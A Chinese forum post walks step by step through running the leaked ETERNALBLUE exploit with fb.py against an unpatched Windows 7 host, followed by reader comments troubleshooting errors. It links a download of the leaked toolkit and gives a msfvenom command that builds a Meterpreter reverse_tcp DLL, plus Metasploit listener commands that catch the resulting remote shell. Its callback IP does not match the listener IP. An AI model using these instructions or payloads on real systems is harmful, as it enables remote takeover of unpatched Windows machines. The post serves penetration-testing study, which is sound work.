方程式ETERNALBLUE 之fb.py的复现

2017-04-15 17:04:29 135 36622 1
那会在微信群,9484应大家的建议,写了一篇关于方程式的FB.py复现的一篇文章,这篇文章是9484写的,我只是代发。推给大家,希望能解决大家的困惑,文章写的很清晰,我不多BB了,不然要挨骂。嘿嘿。
十分感谢9484大牛的分享!

0x01.环境简介

攻击机win2003
ip:192.168.1.105
攻击机kali:
ip:192.168.1.106
靶机(被攻击机)window7 x64(未装smb漏洞补丁)
ip:192.168.1.100

0x02.windows2003攻击机

攻击机win2003安装环境:

python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
方程式ETERNALBLUE 下载地址:
https://codeload.github.com/misterch0c/shadowbroker/zip/master


安装好python后,需要在win2003设置环境变量:



将整个ETERNALBLUE 目录下的 windows拷贝到攻击机win2003上



在windows目录下建立一个文件为:listeningposts

运行phthon  fb.py

以下在攻击机win2003上执行fb.py的具体命令重要命令如下,其他命令都用回车执行。







0x03.攻击机kali上

利用msf生成一个dll劫持文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.131 LPORT=5555 -f dll > /opt/s.dll


将s.dll文件拷贝到windows2003的C盘目录下:

在msf下开启msfpaylod监听:
use exploit/multi/handler

set lhost 192.168.1.106

set lport 5555

set PAYLOAD windows/x64/meterpreter/reverse_tcp

exploit


0x04.接着在windows2003下执行







最后在msf下可以看到成功反弹shell:



doc文档
链接:http://pan.baidu.com/s/1bo2tHuv 密码:hq47
类别 渗透测试

关于作者

我已成年23篇文章501篇回复

我已成年
135

评论135次

要评论?请先  登录  或  注册
  • 75楼
    jzking121
    Rank: 1
    2017-4-16 15:10

    按照楼主的方法成功了,但是win7 x32 没成功啊。

  • 74楼
    Anonymous
    Rank: 2
    2017-4-16 14:58
    Anonymous

    报下面的错Execute Plugin? : yesExecuting PluginConnecting to target for exploitation. Connection established for exploitation.Pinging backdoor... Backdoor not installed, game on.Building exploit bufferSending all but last fragment of exploit packet. Error sending first packetCORE terminated with status code 0xdf5d000cError getting output back from Core; aborting...Plugin failedError: Eternalblue Failed

    1

    ...找到原因了,一台没开防火墙,一台开着防火墙

  • 73楼
    Anonymous
    Rank: 2
    2017-4-16 14:44

    报下面的错 Execute Plugin? [Yes] : yes Executing Plugin Connecting to target for exploitation. [+] Connection established for exploitation. Pinging backdoor... [+] Backdoor not installed, game on. Building exploit buffer Sending all but last fragment of exploit packet .[-] Error sending first packet CORE terminated with status code 0xdf5d000c Error getting output back from Core; aborting... Plugin failed Error: Eternalblue Failed

  • 72楼
    Anonymous
    Rank: 1
    2017-4-16 13:51

    为何在mac在执行出现这种错误,难道不支持吗

    #windows python fb.py You are running on an unsuported architecture!

  • 71楼
    linglin
    Rank: 1
    2017-4-16 12:50

    好厉害的所

  • 70楼
    小手冰凉ing
    Rank: 1
    2017-4-16 12:12

    干货 从文件看只能在win机器上跑了 很多exe文件

  • 69楼
    28270372
    Rank: 1
    2017-4-16 09:32

    要狂就狂这一回,我也称年爱谁谁?

  • 68楼
    Sonar
    Rank: 2
    2017-4-16 02:09

    配置一样,msf监听不了,目标机一分钟后重启,试了两次了,都是这样

  • 67楼
    我已成年
    Rank: 2
    2017-4-16 01:03
    LWTFQ

    我怎么监听不了呢 有老表有同样的情况么 内网里

    1

    监听不了?怎么可能。哪里设置错了吧

  • 66楼
    qhkest
    Rank: 2
    2017-4-16 00:57

    看样子,不错。可以使用就好。赶快吊起来吧。小伙伴们,今夜注定不能入眠啊。

  • 65楼
    LWTFQ
    Rank: 2
    2017-4-16 00:35

    我怎么监听不了呢 有老表有同样的情况么 内网里

  • 64楼
    我已成年
    Rank: 2
    2017-4-16 00:34
    czyccs

    @我已成年 win7的xi统,64位,完全安装你的步骤安装python2.6,并且修改了环境配置。换虚拟机也是出现这样的情况,然后换win2003虚拟机,64位的,安装pywin32提示无法安装,真是把所有别人没遇到的毛病全搞了个遍===气哭

    1

    pyhon2.6你下载的是32位的吗?python2.6必须是32位

  • 63楼
    czyccs
    Rank: 2
    2017-4-16 00:22

    @我已成年 win7的xi统,64位,完全安装你的步骤安装python2.6,并且修改了环境配置。换虚拟机也是出现这样的情况,然后换win2003虚拟机,64位的,安装pywin32提示无法安装,真是把所有别人没遇到的毛病全搞了个遍===气哭

  • 62楼
    czyccs
    Rank: 2
    2017-4-16 00:14

    @我已成年 我安装了啊

  • 61楼
    我已成年
    Rank: 2
    2017-4-15 23:56
    czyccs

    谁遇到过我那种问题????在线等

    1

    不是说了吗,装pywin32

  • 60楼
    我已成年
    Rank: 2
    2017-4-15 23:38
    czyccs

    Traceback (most recent call last): File "fb.py", line 37, in <module> from fuzzbunch.edfplugin import EDFPlugin File "C:\Python26\windows\fuzzbunch\edfplugin.py", line 5, in <module> import edfexecution File "C:\Python26\windows\fuzzbunch\edfexecution.py", line 30, in <module> import win32pipeImportError: DLL load failed: %1 不是有效的 Win32 应用程序。搞了2小时,各种出错

    1

    装pywin32

  • 59楼
    czyccs
    Rank: 2
    2017-4-15 23:38

    谁遇到过我那种问题????在线等

  • 58楼
    czyccs
    Rank: 2
    2017-4-15 23:37

    Traceback (most recent call last): File "fb.py", line 37, in <module> from fuzzbunch.edfplugin import EDFPlugin File "C:\Python26\windows\fuzzbunch\edfplugin.py", line 5, in <module> import edfexecution File "C:\Python26\windows\fuzzbunch\edfexecution.py", line 30, in <module> import win32pipe ImportError: DLL load failed: %1 不是有效的 Win32 应用程序。 搞了2小时,各种出错

  • 57楼
    我已成年
    Rank: 2
    2017-4-15 22:33
    iisnow

    Execute Plugin? : Executing Plugin Connecting to target for exploitation. Connection established for exploitation. Pinging backdoor... Backdoor not installed, game on. Target OS selected is not valid for OS indicated by SMB reply CORE raw buffer dump (43 bytes):0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 20x00000010 30 30 33 20 52 32 20 33 37 39 30 20 53 65 72 76 003 R2 3790 Serv0x00000020 69 63 65 20 50 61 63 6b 20 32 00 ice Pack 2. CORE terminated with status code 0xdf5d0036 Error getting output back from Core; aborting... Plugin failed Error: Eternalblue Failed报了这个错误 一脸懵逼

    1
    我已成年

    报这个,说明漏洞不存在哦

    2
    iisnow

    我试了好多都是这样的。。。

    3

    很正常,这个又不是一打一个准

  • 56楼
    我已成年
    Rank: 2
    2017-4-15 22:31
    Aimuer

    Python 版本必须是32位的吧

    1

    必须32位